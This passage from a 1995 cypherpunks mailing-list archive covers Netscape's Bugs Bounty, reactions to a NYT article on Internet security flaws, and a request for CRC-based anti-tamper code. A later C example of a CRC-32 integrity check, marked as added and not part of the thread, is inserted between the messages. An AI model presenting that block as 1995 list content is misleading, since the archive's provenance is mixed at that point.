obscurity" is something we usually dislike around here, and you may
see the term "security through obscurity" used as a way of insulting
some cryptographic system or security system from time to time if it
depends on people not knowing how it works in order to keep it secure.

If you are interested in cryptography and in learning a bit about what
we do, I suggest that you first read a good introductory book on
cryptography like Bruce Schneier's "Applied Cryptography" (which is
coming out in a new edition in only a few weeks) and that you listen
a bit to the conversation around here -- you might also want to read
some of the back archives of the mailing list on www.hks.net.

You also might have other questions. One good way to deal with them is
to first see if you can find the answer in Schneier's book or the
archives, and then to try to ask the list if it's a question that lots
of people might want to think about, or send mail to a single person
who probably knows the answer if you don't think it's worth bothering
everyone about.

Above all, it's important to remember that people around here are often
trying to get work done, and will answer quiet, polite questions
before they will answer loud and obnoxious ones.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 13 Oct 95 04:03:17 PDT
To: ecarp@netcom.com (Ed Carp)
Subject: Re: looking for anti-tamper software
In-Reply-To: <199510130455.VAA29233@netcom6.netcom.com>
Message-ID: <9510131100.AA17114@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> I used to have this C source that I could embed in a program, and it
> would tell me if the software had been tampered with at runtime.  I've
> lost/mislaid/whatever the source, and I was wondering if anyone had anything
> that would do the same thing.  As I recall, it calculated a simple CRC and
> embedded it into the .EXE file (it was written for MS-DOS).
> 
> It doesn't need to be cryptographically secure - I just need to check to see
> if the executable has been corrupted.  I've leafed through alt.sources and
> comp.sources.*.

You are aware that there is a generic attack against all such defenses -
aren't you? It has been published for 7+ years.  For details see:

	A Short Course on Computer Viruses - Wiley and Sons - 94

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 13 Oct 95 04:14:19 PDT
To: cypherpunks@toad.com
Subject: NYT Markoff Article and one person's response
Message-ID: <9510131111.AA17607@all.net>
MIME-Version: 1.0
Content-Type: text


I sent the following letter to the editor of the NYT expressing my
personal view of the article.  Perhaps others on this list should send
letters expressing their viewpoints as well.

Dear Sir/Madam:

	I have been reading, with great interest, the responses from
security experts all over the Internet to John Markoff's October 11
article titled "Discovery of Internet Flaws Is Setback for On-Line
Trade", and I thought your readers might like to know what real experts
in the field think about Mr.  Markoff's article. 

	While the most recent announcement by Professor Brewer was
generally taken as a positive step from American academia in catching up
to the rest of the information security world, it is hardly a
breakthrough, or even a novelty. 

	To get a perspective on this, an average of about 10 new
vulnerabilities of this magnitude or larger are discussed on Internet
forums every month.  The "CERT" team at Carnegie-Mellon University
has published more than 10 similar types of attacks so far this year,
the Internet forum "8lgm" publishes an average of more than one per
month, the "BugTraq" Internet forum tracks and shows fixes for about
two similar holes per month, and the "cypherpunks" forum uncovers
several holes in cryptographic and other systems each month.

	The idea portrayed by Mr.  Markoff that businesses rushing to
the Internet are largely unaware of these risks is also quite naive.  A
recent Computer Security Institute study showed that one in every five
enterprises has reported suffering an Internet security incident.  Most
experts believe the reality is much worse and that many who responded
"no" either refuse to admit it or simply don't know.  Over 50 percent of
companies connected to the Internet provide high-risk features such as
FTP and WWW to all employees, and 39 percent have no firewall to limit
attacks from the Internet.  According to several published papers, about
10 times as many attempted attacks are detected when firewalls are in
place than are detected when they are not in place. 

	Since the Internet was first introduced, many of the American
Universities that have been so active in developing information
technology have essentially ignored the security issues.  Their
ignorance of these issues has produced literally hundreds of protocols
that are now in use by millions of computers from all over the globe and
which, because of their insecure designs, are inherently difficult to
secure. 

	Thousands of individuals from all over the world have spent
their spare time, often on nights and weekends, helping other people by
developing and freely distributing new security technologies.  They have
been finding security problems and solving them for many years, most
often without recognition or remuneration.  They have been trying to
tell the people developing these protocols about protection problems and
have been widely ignored, with a few notable exceptions, by the American
Universities. 

	I personally think that it is a travesty that a relatively minor
contribution by a few people at Berkeley gets front page headlines while
the ongoing contributions of thousands of volunteers go largely
unrecognized.  If you want the real story about electronic commerce and
security issues on the Internet, listen to the people who are doing the
work every day. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Fri, 13 Oct 95 00:34:26 PDT
To: cypherpunks@toad.com
Subject: what are these people selling????
Message-ID: <9510130722.AA03096@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


why is the cp meeting sponsored by sun?
so we can hear a sales pitch on java?
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 13 Oct 95 07:38:52 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: The Economist on Netscape "hackers"
In-Reply-To: <199510130705.AA35603@junkers.lochard.com.au>
Message-ID: <Pine.SOL.3.91.951013072726.26875B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Mark wrote:
> 
> >Raph (who's wondering if there's something inherent in the media
> >process that keeps them from getting their stories straight)
> 
> Reporters. Editors. Owners.

Usually the Economist does take pains to get their facts right, and to 
print corrections if errors are reported. Recently they have been making 
a few more mistakes than they used to in their net coverage (most amusing 
mistake was making John Curran CTO of BBN instead of BBN Planet). 

They did come to the right conclusion on the payment standards issue, so 
they do deserve at least a B-.

Simon

----
(defun modexpt (x y n)  "computes (x^y) mod n"  
   (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@netcom.com (Ed Carp)
Date: Fri, 13 Oct 95 08:17:46 PDT
To: cypherpunks@toad.com
Subject: re: anti-tamper software
Message-ID: <199510131516.IAA10764@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to all who replied to my request, although it seems I didn't quite
make it clear what I was looking for.

I'm not particularly interested in a strong cryptographic solution, as this
isn't intended to detect intentional tampering - just unintentional, such
as a bad spot on a hard drive or corruption.  Turns out that Simtel has
a couple of such packages in /SimTel/msdos/virus - CVIRPROT.ZIP is enough
protection, although STEALTH.ZIP looked intriguing...

I was, however, interested in what Fred Cohen said about there being a generic
attack against such methods when applied to software protection against viruses
(virii?).  Is there such a generic attack, besides the obvious of jumping around
the detection code?  How about encrypting the executable, adding loader and
decryption code, then decrypting the executable at runtime - would that defeat
such an attack, or are all such defenses doomed to failure?
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes
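
The check described in the message above (a simple CRC computed over the executable and stored with it, meant to catch accidental corruption only), as an added example that is not code from this thread or from the SimTel packages it names. CRC-32 stands in for the "simple CRC"; the "CRC!" trailer layout, the function names and the sample image are assumptions made for the example.

```c
/* Added example: CRC-32 trailer that catches accidental corruption of a
 * program image. Trailer layout ("CRC!" + 4 CRC bytes, little-endian) and
 * all names are assumptions made for this example. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TRAILER_MAGIC "CRC!"
#define TRAILER_LEN   8

enum verify_result { IMG_OK, IMG_TOO_SHORT, IMG_NO_TRAILER,
                     IMG_CRC_MISMATCH, IMG_IO_ERROR };

/* Bitwise CRC-32, reflected polynomial 0xEDB88320 (the zip/Ethernet CRC). */
uint32_t crc32_buf(const unsigned char *p, size_t n)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc & 1u) ? (crc >> 1) ^ 0xEDB88320u : crc >> 1;
    }
    return crc ^ 0xFFFFFFFFu;
}

/* Write the trailer after body_len bytes; returns sealed length, 0 if no room. */
size_t seal_image(unsigned char *buf, size_t body_len, size_t cap)
{
    if (cap < body_len || cap - body_len < TRAILER_LEN)
        return 0;
    uint32_t crc = crc32_buf(buf, body_len);
    memcpy(buf + body_len, TRAILER_MAGIC, 4);
    for (int i = 0; i < 4; i++)
        buf[body_len + 4 + i] = (unsigned char)(crc >> (8 * i));
    return body_len + TRAILER_LEN;
}

/* Recompute the CRC over everything before the trailer and compare. */
enum verify_result verify_image(const unsigned char *buf, size_t len)
{
    if (len < TRAILER_LEN)
        return IMG_TOO_SHORT;
    size_t body_len = len - TRAILER_LEN;
    if (memcmp(buf + body_len, TRAILER_MAGIC, 4) != 0)
        return IMG_NO_TRAILER;
    uint32_t stored = 0;
    for (int i = 0; i < 4; i++)
        stored |= (uint32_t)buf[body_len + 4 + i] << (8 * i);
    return crc32_buf(buf, body_len) == stored ? IMG_OK : IMG_CRC_MISMATCH;
}

/* What a program would call on its own file at startup. */
enum verify_result verify_file(const char *path)
{
    enum verify_result r = IMG_IO_ERROR;
    unsigned char *buf = NULL;
    long size = 0;
    FILE *f = fopen(path, "rb");
    if (!f)
        return r;
    if (fseek(f, 0, SEEK_END) == 0 && (size = ftell(f)) >= 0 &&
        fseek(f, 0, SEEK_SET) == 0 && (buf = malloc((size_t)size + 1)) != NULL &&
        fread(buf, 1, (size_t)size, f) == (size_t)size)
        r = verify_image(buf, (size_t)size);
    free(buf);
    fclose(f);
    return r;
}

/* Constructed sample image; mode selects what happens before the check:
 * 0 intact, 1 one bit flipped, 2 last byte lost, 3 changed and re-sealed. */
enum verify_result demo(int mode)
{
    static const char body[] = "MZ constructed sample image, not a real .EXE";
    unsigned char img[sizeof body + TRAILER_LEN];
    size_t body_len = sizeof body - 1;
    memcpy(img, body, body_len);
    size_t len = seal_image(img, body_len, sizeof img);

    if (mode == 1 || mode == 3)
        img[10] ^= 0x04;          /* one bit changed in the body */
    if (mode == 2)
        len -= 1;                 /* simulated truncated copy */
    if (mode == 3)                /* the CRC is unkeyed, so it can be redone */
        len = seal_image(img, body_len, sizeof img);
    return verify_image(img, len);
}

int main(void)
{
    static const char *names[] = { "OK", "TOO_SHORT", "NO_TRAILER",
                                   "CRC_MISMATCH", "IO_ERROR" };
    for (int mode = 0; mode < 4; mode++)
        printf("mode %d -> %s\n", mode, names[demo(mode)]);
    return 0;
}
```

Mode 3 verifies as OK because an unkeyed CRC can be recomputed by whoever changes the image, so the check covers bad sectors and truncated copies, not deliberate modification.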



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 13 Oct 95 08:33:21 PDT
To: cypherpunks@toad.com
Subject: Re: 90%
Message-ID: <199510131533.IAA14463@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 10/12/95 -0400, you wrote:
>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

We are into cryptography because it holds the secrets, not to raising havoc,
but the eldritch gods who inspire it.  PGP is actually a plot by the Old
Ones(tm) to return to the earth to rule again.  Digital signatures are the
invocation to open the gate.  When the stars are near prime and the
algorithm is correct, the Old Ones(tm) will rise from the curves of space
and claim their place as the rulers of the TLAs.

Any other information you are not cleared for at this time.

(tm) is a trademark of Tim May and/or any tentacles he may designate.

|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Fri, 13 Oct 95 05:41:33 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: The Economist on Netscape "hackers"
In-Reply-To: <199510130705.AA35603@junkers.lochard.com.au>
Message-ID: <Pine.3.89.9510130804.A15602-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Oct 1995, Mark wrote:

> Hacker good. Cracker bad. Media distort hacker to bad. Media hype merchants.
> Media bad. Bad ol' Media. Degauss. Reformat.
> 
> >Raph (who's wondering if there's something inherent in the media
> >process that keeps them from getting their stories straight)
> 
> Reporters. Editors. Owners.
I'd say there's a nice market right now for people on this list to freelance
some accurate security and crypto articles out to the traditional media.
(accurate meaning your own personal bias)

While a nobody like me isn't going to get published in Time, I don't see 
why, oh, let's say a Kevin Kelly or a Steven Levy couldn't. Besides, there's
still an opening for all the rest of us to get published in the various 
computer trades and net mags. I'm positive *some* take freelancers.

If a lot of you get quoted and even interviewed in the bad ol' media,
and you actually care about getting the story right, why not write your 
own press releases and articles?

If you just managed the next netscape crack, release the crack and an 
export control critique together. You might even make some money out of it. 
In their rush to print, editors would rather have first hand info asap than 
their half-competent journalist's misunderstanding of it tomorrow. 

It's better than working for t-shirts. (Yes, I'm sure they're nice, Sameer)

If you want accurate press, you have to write it.
(Disclaimer: I am not now, nor have ever been a journalist, so I really 
don't have a lousy clue if I'm right)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 13 Oct 95 08:58:26 PDT
To: an116512@anon.penet.fi
Subject: Re: what are these people selling????
In-Reply-To: <9510130722.AA03096@anon.penet.fi>
Message-ID: <199510131552.IAA22648@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The cp meeting is not "sponsored by sun". It is being held at
sun.  Did you think earlier cp meetings were sponsored by sgi or
cygnus?

	What's wrong with hearing a sales pitch on java, anyway? 

> 
> why is the cp meeting sponsored by sun?
> so we can hear a sales pitch on java?
> --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
> Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
> Please, report inappropriate use to                abuse@anon.penet.fi
> For information (incl. non-anon reply) write to    help@anon.penet.fi
> If you have any problems, address them to          admin@anon.penet.fi
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Fri, 13 Oct 95 01:27:29 PDT
To: cypherpunks@toad.com
Subject: Re: T-Shirts
In-Reply-To: <199510130532.BAA23011@jekyll.piermont.com>
Message-ID: <199510130827.JAA17366@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hey Perry, I think this is pushing it a bit too far:

"Perry E. Metzger" <perry@piermont.com> writes
>zoetrope@infinet.com writes:
>>         Ya but a multi million dollar corp like netscape should be paying
>> big bucks for those bugs....Or the mob might...ya get my drift....Alot of
>> people give personalized T-shirts but not everyone can jeapordize a corps
>> existed?
>
>If you are looking to make money off of this sort of thing, get a
>reputation and start consulting or selling security software.  If your
>interest is just in being obnoxious, please crawl back under your
>rock. Either way, you are way out of line.
>
	Sorry, but I think the guy has a point. And all his rights to
expose it. Do you read sci.crypt? Looks like you don't. I've lost track
(nor do I try to keep it) of the amount of typical answers of the likes
of:
	> Can you break my algorithm?
	Yeah. Send the source and offer a good reward so someone thinks it
	worth breaking it.

	So far so good! And then someone comes asking why should anybody
do consultancy work for a multimillion corporation (e.g. MicroSoft) with
no access to sources for free or just a "high-quality T-shirt" that can't 
be worth more than 100$ and all he gets is a kick in the ass.

	Well, I agree that discovering the Pentium bug was great. But it
would have been better if it didn't exist. Many companies invest zillions
of dollars in testing. Why should I save that money to a greedy company?

	By the same rule, you may as well propose that we let the Gov'ts
do as they wish with cryptography. Why should they try to make things right
the first time? Let people discover mistakes later, and complain. If
they can.

	The point is: regarding cryptography and security as with anything
else: one should be sure his/her solutions work before wasting other people's
time. Like, e.g. before asking if his ROT16 algorithm is safe. Isn't it
embarrassing that any corp. asks for testing of programs before even having
made sure they check for array overflows?

>Oh, and you might want to learn how to spell and how to write in
>standard English grammar if you want to be taken seriously.
>
	And that's the best part of all! Well, I'm not a native English
speaker. So maybe I shouldn't be on this list. Nor should any other
foreigner. More so since I think contents are more important than the way
they are expressed.

	For that sake we could also give away crypto. It isn't reputable
and standard English, so it can't be taken seriously.

	I don't want to start a flame war. I'd just prefer to discuss
other topics, in any 'spaghetti -or scrambled- language' as long as I can 
understand it.

				jr
--
These opinions are mine and only mine. Hey, man, I saw them first!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 12 Oct 95 17:12:24 PDT
To: perry@piermont.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510121454.KAA20694@jekyll.piermont.com>
Message-ID: <199510122235.AA41086@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>It was surprisingly weak for a John Markoff story (he usually gets the
>details exactly right) but it is an issue that had to be brought up
>and I see no reason to call it a bad article overall.

*snort* I've been trying to keep my views to myself on this but claiming
Markoff usually gets things right is plain misleading. His articles are
about as one-sided as you can get and full of factual inaccuracies. The
Mitnick series were a farce and his latest work is reactionary fluff and
shows his true lack of understanding of his topics.

The only value I find in his work is the humour value of laughing at the rot
on the pages. Unfortunately it really isn't a laughing matter to go around
creating incorrect impressions, especially about something with as much
potential as the inet.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be my own.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Oct 95 06:44:07 PDT
To: cypherpunks@toad.com
Subject: FT on IT Standards
Message-ID: <199510131344.JAA16578@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Financial Times today has a four-page insert on the
   complexity and difficulty of developing international
   standards for all types of products. There is a passing
   mention of the Internet security issue. An article on
   standards for IT confirms Perry's oft-made points about the
   slow pace, protracted angling for market share, and the
   bypass of standards by market go-getters who foster messes.
   Here are quotes on the last point:

      Paul Callahan of Forrester Research: "When a company
      owns a market they can determine the pace -- a company
      in its early stages of domination can move the ball
      forward swiftly -- such as the Internet Web software
      provider Netscape. Netscape didn't spend a lot of time
      with standards bodies -- it simply joined forces with
      MasterCard to co-develop Secure Courier, much as
      Microsoft enrolled Visa to develop its STT, Secure
      Transaction Technology. Only afterwards are the
      overtures made to standards bodies. That's commerce, and
      it's the way things are in the real world."

      Henry Ryan, convenor of the ISO-IEC JTC1 ad hoc working
      group on GII: "People ask, 'Can you afford to wait for
      standards?' I'd turn it round. If you don't, you suffer
      in the long term and end up with an unholy mess. If
      people do their own thing then the benefits -- and the
      problems -- may not be concentrated in one sector of the
      industry. We're finding that with the convergence of
      technologies, such as the superhighway, it isn't enough
      to develop standards for the IT sector,
      telecommunications, or consumer electronics
      individually."














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 13 Oct 95 09:48:48 PDT
To: cypherpunks@toad.com
Subject: Bugs Bounty?? ... shhh ... I'm huntin wa'bits ...
Message-ID: <199510131647.JAA17906@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Netscape Announces Bugs Bounty with release of Netscape Navigator 2.0 beta
> 
> Program harnesses power of the Internet to help Netscape refine Beta  
> versions and ensure highest quality software.

Or at least this was the headline on the announcement from 
                http://www.netscape.com 

> MOUNTAIN VIEW, Calif. (October 10, 1995) -- Netscape Communications
> Corporation (NASDAQ:  NSCP) today  introduced the "Netscape Bugs 
> Bounty", a program that rewards users who help Netscape find and report 
> "bugs" in the beta versions of its recently announced Netscape 
> Navigator 2.0 software.
> The beta versions of the popular network navigation software are available
> today for downloading on the Internet for free evaluation.

I was immediately overjoyed when I read that first paragraph.  The sheer
delight and mention of rewards -- whether it's frequent flyer points or
just simple little gold stars and pats on the head -- motivates me to just
go out and do it.  Go out and do whatever the offeror needs, so I can
collect my nice juicy reward.  A win/win situation.  But something about
this announcement seemed a little "too" polished ... (maybe it's just
seeing how the last "Netscape bug situation" was spinned, ... I don't
know). 

But I decided to read on, wanting to find out how Netscape "rewards" users
who bring them "bad news".  It was a slow afternoon, and I had just
finished listening to that odious Dominick Dunne on Larry King.  What the
hey, I thought. 

Let's read on and discover more about the Bounty from Netscape. 

> The contest begins with the beta versions of Netscape Navigator 2.0 --
> available for Windows, Macintosh and X Window System operating environments
> -- that are on the Internet today.  FULL RULES FOR THE CONTEST will be
> available on Netscape's home page at http://home.netscape.com.  As the
> rules will explain in detail, users who are the first to report a
> particular bug will be rewarded with various prizes depending on the bug
> class:  users reporting significant security bugs as judged by Netscape
> will collect a cash prize;  users finding any security
> bugs will win Netscape merchandise;  and users finding other serious bugs
> will be eligible to win a choice of items from the Netscape General Store.

Gee this was sounding, really really good.  But that FULL RULES thing was
highlighted on my screen (I was running Lynx 2.2 at the time ...), so I
had a quick little old jump over to the FULL RULES.  And with just a <cr>
I was off ... and rule-reading before the big hunt ... 

The rules started off ... 

> We're in the process of building a series of new technologies, such
> as Java, into Netscape Navigator 2.0. Navigator 2.0 will usher in a new
> way to use computers and networks, as well as create new opportunities
> for people to build applications.

Wow, I said.  New opportunities to build applications ;) New ways to use
computers.  New ways to use networks.  All ushered in by Netscape.  That
all sounds really, really GOOD!! 

I was eager, and ready for all of this newness. 

> We're eager to make sure that our new product is as bug-free as possible.
> To that end, in addition to our internal testing, we're now offering prizes
> and bounties for certain types of bugs found in the beta versions of
> Navigator 2.0 starting with the beta versions listed at the bottom of 
> the page.

Oh good.  Finally a company that's interested in making a product as bug
free as possible.  And Prizes and Bounties!!!  Joy!!  Joy!! 

My adrenaline began to flood.  Every neuron was piqued.  I was ready to
read on.  This was slowly turning into as satisfying a hunt as any one I'd
ever been on, even though we were only hunting for little old Bugs, and
not big cats.  None the less, it sounded like a fine afternoon of sport. 
Especially after Dominick Dunne. 

> This contest begins on October 11 and ends when Navigator 2.0 ships
> release versions on supported Macintosh, Windows, and Unix platforms. 
> If the release date for the final version varies by platform, then the 
> contest will continue until Netscape has released final versions of 
> Netscape Navigator 2.0 on all 3 platforms.
> 
> For questions regarding this contest email "contest_questions@netscape.com"
> All questions and notifications will be handled via email. Netscape may
> choose to respond to your questions individually, or as part of a 
> generalized response. Netscape will strive to respond as fully as 
> possible, but can not guarantee a response to all questions we receive.

Hmmm, I thought.  This is odd. 

Here I am potentially reporting a very important problem, to Netscape, and
the company is saying that they might not even choose to respond to
questions.  

I began to wonder whether Ford could have ever gotten away with not
responding to queries about their products.  Especially defects.  I
wondered what would have been the reaction if Ford decided not to answer
mail that inquired about the wee little problem with their Pintos. 

But this was a different industry.  This was software.  Internet software. 
The hottest, sportiest, new-fangleddy dandiest stuff around. 

Not responding to mail, but of course!!  They're busily harnessing the
power of the Internet to deliver software that's bug-free.  They can't be
bothered with small things like customers.  They want bounty-hunters. 

But no need to let the glow fade so fast.  I'm sure that they'll just be
swamped with mail ... now let's get to their "proactive reward program"  

(although I don't know how you reconcile running a contest to improve your
product with ignoring mail ... must be some newfangled modern hip-hop
do-op bee-bop communications graduate theory thingy, that I just don't
quite know how to parse.)

> Anyone who finds a severe bug (as defined by us) that hasn't been
> previously found and can be reproduced by us will be entered in drawings
> for prizes from our GENERAL STORE.

Hmmm, a severe bug (as defined by them).  Is this like a Level One??  I
wonder what that would be.  

But let's get to the meat of the matter, what are the prizes that Netscape
is offering to harness the power of the Internet while they ignore and
don't (selectively) reply to email. 

> Netscape will conduct 2 drawings and will award 50 prizes in each drawing,
> for a total of 100 prizes. 50 will be nifty Netscape Mozilla mugs and 50
> will be snazzy Netscape polo shirts. We'll award either a mug or a shirt,
> our choice, to the submitters of each of 100 bugs drawn randomly.

<cough> ... 'scuse me ... a nifty Netscape Mozilla mug??  50 of them do
you say?? 

Let's, see.  Last time I checked a single share of Netscape Communications
Corporation (NASDAQ:  NSCP) was trading for about $60 plus change.  I
calculated the wholesale cost of the mugs at approximately $1.20 each,
which would bring the total mug promotion budget (50 * $1.20) to the
equivalent of one single share of NSCP. 

Gee, that certainly motivates me.

But then again, there's those snazzy Netscape polo shirts. ;-)

Shame that Netscape isn't Microsoft.  I'm sure that other vendors might 
at least offer the Great Powerful Internet Bugs Hunters a choice between the
snazzy shirt or the nifty mug?  But I guess most of the shirts and mugs 
weren't reserved for the Bugs Hunters.  They were probably in de press kits.

> We'll conduct the first drawing when we ship Beta 2 for all platforms 
> and the second drawing when we release the final version of Netscape 
> Navigator 2.0.
>
> If you find a Security bug that hasn't been previously found, and can 
> be reproduced by us, we'll contact you via email and offer you your choice 
> of any item in the Navigator products or Bazaar section of our General 
> Store.

Wow, I thought.

I was stupefied.  If I found one of the Security bugs, I could get a copy
of one of the Buggy Products absolutely FREE!!!  Gratis!!  What man could
turn his nose up at that kind of offer. 

This lil old rest-stop cum cafe, the one that's putting out the bounty
offers on the info-highway ain't like no little greasy spoon where you
stop for chile and then get CHARGED when you find a cockroach on your
spoon staring you down eye to eye. 

Heck no, this is a CLASS operation.  

Dinner's on the house.

> And if the security bug you find is severe as defined by Netscape, and 
> hasn't been previously found, and can be reproduced by us, we'll write 
> you a check for $1000.

Now we're really talking ...If you find a really, really severe bad
problem, we'll reward you with the equivalent of 16.5 shares of Netscape. 
A veritable REWARD OF REWARDS!! 

> No purchase is necessary. All entries become the property of Netscape,
> and may be modified, revised, edited, incorporated into Netscape products
> and otherwise used at Netscape's sole discretion.

Oh, oh ... incorporated into Netscape products???

This is sort of a non-consensual waiver of all of your rights by
participating in this contest??  Now this made me want to stop and
cogitate for a lil bit. 

I thought ...(but only for a second, of course, cause there were bugs to
hunt) and I thought ... and I thought that security bugs were much too
important to stop this over such a trivial matter, as negotiating my 
rights away for the benefit of possibly getting a mug. 

But there was no time to stop and think.  Security bugs were going to be
our target.  Big Game.  None of that discretionary mug stuff for us ... we
can't be bribed that easily ... no sirree, bob. 
 
> Netscape is not responsible for late, lost, or misdirected entries.
> All taxes on prizes are the sole responsibility of winners. By 
> participating you agree to these rules and the decisions of the judges, 
> which will be final
> Any disputes concerning this event will be settled by arbitration.

Tax on a mug??  Ok ... I think we understand each other now.  The budget's
tight, and all.  The plan really wasn't well thought out, and of course we
all know that the IPO didn't do that well, and blah, and blah, blah, blah. 

Ahh, but a hunt's a hunt.  So a hunting, we will go.

(Phew, isn't this a long post to the list???  I haven't really said
anything about the SECURITY BUG yet, have I??  Sheesh, I'm so, so
verbose.)

But first, what is a SECURITY BUG, anyway??  What does Netscape's marketing
machine consider a REAL SECURITY BUG??  If we know that, then we'll know 
where to look.

Before we get to that ... one last quote from Netscape's spokesman, Homer.

> "We are continuing to encourage users to provide feedback on new versions
> of our software, and the Netscape Bugs Bounty is a natural extension of
> that process," said  Mike Homer, vice president of marketing at Netscape.
> "By rewarding users for quickly identifying and reporting bugs back to us,
> this program will encourage an extensive, open review of Netscape Navigator
> 2.0 and will help us to continue to create products of the highest
> quality."

Gee, don't worry, Homer.  The POWER OF THE INTERNET will help you to
create products of the highest quality.  And the POWER OF THE INTERNET
will encourage a real extensive open review.  And watch for my new home
page coming to a web site near you. 

The one titled, "I DEBUGGED NAVIGATOR AND ALL I GOT WAS A LOUSY SHIRT."

But back to the question of what is a Security Bug??  Because I'm not sure
if Marketing is going to agree (in its sole discretion) with what a
security bug is (even if it has been hunted down).  So at the risk of
boring everyone to tears, I'll simply provide some external standards on
the matter, just so I don't jeopardize my bounty or my shirt or my mug. 
Let's start with some Orange Book standards. 

The Orange Book, DEPARTMENT OF DEFENSE STANDARD, DEPARTMENT OF DEFENSE
TRUSTED COMPUTER SYSTEM EVALUATION CRITERIA (DoD 5200.28-STD) which we're
all intimately familiar with, since it of course sets the standard for
everyone from the Small Business Administration to the National Science
Foundation, (I think).  Anyhow, it makes these points: 

DoD Directive 5200.28, "Security Requirements for Automatic Data
Processing (ADP) Systems," stipulates: "Classified material contained in
an ADP system shall be safeguarded by the continuous employment of
protective features in the system's hardware and software design and
configuration .  .  .  ."[8, sec.  IV] Furthermore, it is required that
ADP systems that "process, store, or use classified data and produce
classified information will, with reasonable dependability, prevent: 

     a.  Deliberate or inadvertent access to classified material by
         unauthorized persons, and

     b.  Unauthorized manipulation of the computer and its associated
         peripheral devices."[8, sec. I B.3]

The concern here is with the latter standard.  The unauthorized
manipulation of a computer and its associated peripheral devices.  And
this is where we jump onto the scent of the track of the Security Bug. 

And this is where we introduce a little old document called pushpull.html
from Netscape's Web site.  It's titled:  An Exploration of Dynamic
Documents. 

> The Great Idea
> 
> The general idea is that browsers have always been driven by user
> input.  You click on a link or an icon or an image and some data comes
> to you.  As soon as people saw they could do that, they wanted to give
> a server the ability to push new data down to the browser.  (An
> obvious example is a stock trader who wants to see new quote data
> every 5 minutes.)  Up until now, that hasn't been possible.

And I can think of many people who would _also_ like to push down data
to a browser.  But, that's not a great idea.  Guess what??  It's not even 
a good idea.  It might even be a bad idea.

> Netscape Navigator 1.1 gives content creators and server
> administrators two new open standards-based mechanisms for making this
> work.  The mechanisms are similar in nature and effect, but
> complementary.  They are: 
>
>     Server push -- the server sends down a chunk of data; the
